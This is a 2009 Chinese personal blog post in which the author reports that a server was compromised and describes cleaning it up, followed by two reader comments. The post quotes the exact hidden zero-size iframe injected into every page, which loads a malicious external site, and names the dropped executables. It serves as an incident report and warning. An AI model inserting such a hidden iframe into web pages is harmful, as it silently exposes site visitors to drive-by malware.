Aug 4
 

服务器再次被攻击


 by Richard | 不指定 2009/08/04 18:26 | 分类: 站务 | 评论(2) | 引用(0) | 阅读(635)
| |

存放另外一个站点的服务器(w206)也被攻击了,时间是今天凌晨5:06。

服务器上所有目录下面的index.php、*.htm、*.html均在文件末被植入这样一句代码:

<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


文件长度增加145字节。

检查reycross.net这个站点,IP地址是91.212.198.116,托管在LIR.KZ的机房,位于俄罗斯,而域名是在美国注册。

这个站点已经被报告为攻击网站,存在高度危险。

所以,访问internet网站,需要高度警惕,包括熟悉的网站也是一样。安装防杀病毒、防杀木马的软件是非常必要的。

只是,只是,面对是上千个目录的文件,我还需要逐个去清除。。。。。我晕。。。。

晚上,终于清理完成。发现隐藏在zb\skin\zero_vote\下面有两个执行文件proposta.exe和proposta.ppt.scr,都是43k的大小,FTP上去都删不掉,估计是文件在Windows服务器运行中。于是我找了机房值班人员将它们彻底删除。

删完以后才后悔,没有留一份样本分析。。。。恨。。。。
最新日志 随机日志 综合排行
  • 邻家女孩——雨丹
  • 有一种幸福叫简单
  • 家暴
  • 担当~~~责任~~~
  • 背媳妇 —— 静物随拍一组
  • 迟来的唐山大地震
  • 一声叹息,港媒关于菲律宾游客被...
  • 香港游客在菲律宾被枪手劫持事件...
  • 挟尸要价的争论
  • 因小识大,当年和如今。。。
    		•
  • Nokia 笔记本来了
  • 值得纪念的日子
  • 夜色·国贸桥
  • 性感YOYO @ 小汤山
  • Mimo试用手记
  • 设计私生活——丫头的店中之禅
  • 成就你一生的10个经典寓言故事
  • 2008——没有陌生人的世界
  • 郁闷是否都一样?
  • 小腕儿脾气还挺大
    		•
  • Nokia E61固件升级教程
  • 简约风范·Nokia E60试...
  • 住家美食--微波炉烤红薯
  • 月陀岛•传说中的马尔代夫
  • 贺年短信
  • 商务无敌·Nokia E61试...
  • 天若有情
  • 手机应用商店的凤凰涅槃
  • Nokia E61拆解及更换摇...
  • 师姐的博易·博客价值评估
    		•

    最后编辑: Richard 编辑于2009/08/04 23:49
    Tags: , ,
    by Richard | 不指定 2009/08/04 18:26 | 分类: 站务 | 评论(2) | 引用(0) | 阅读(635)
    DEMO
    2009/08/07 14:05
    用Safe3IF能有效防止攻击。网上都有免费的。我以前的程序老被攻击。下载了这个稍微缓和了。这个能记录攻击者的真实IP地址。
    Richard 回复于 2009/08/07 19:34
    谢谢,您是哪位站长啊?
    DEMO
    2009/08/07 14:19
    其实我觉得,你犯不着一个一个文件去清除的。网上有一个软件的。这里上传不上去文件。这个软件,支持在那个文件包下面找什么内容。找完后,直接替换成空的就OK了。
    Richard 回复于 2009/08/07 19:33
    后来我写了一个程序。。。
    分页: 1/1 第一页 1 最后页
    发表评论
    表情
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    打开HTML
    打开UBB
    打开表情
    隐藏
    记住我
    昵称   密码   游客无需密码
    网址   电邮   [注册]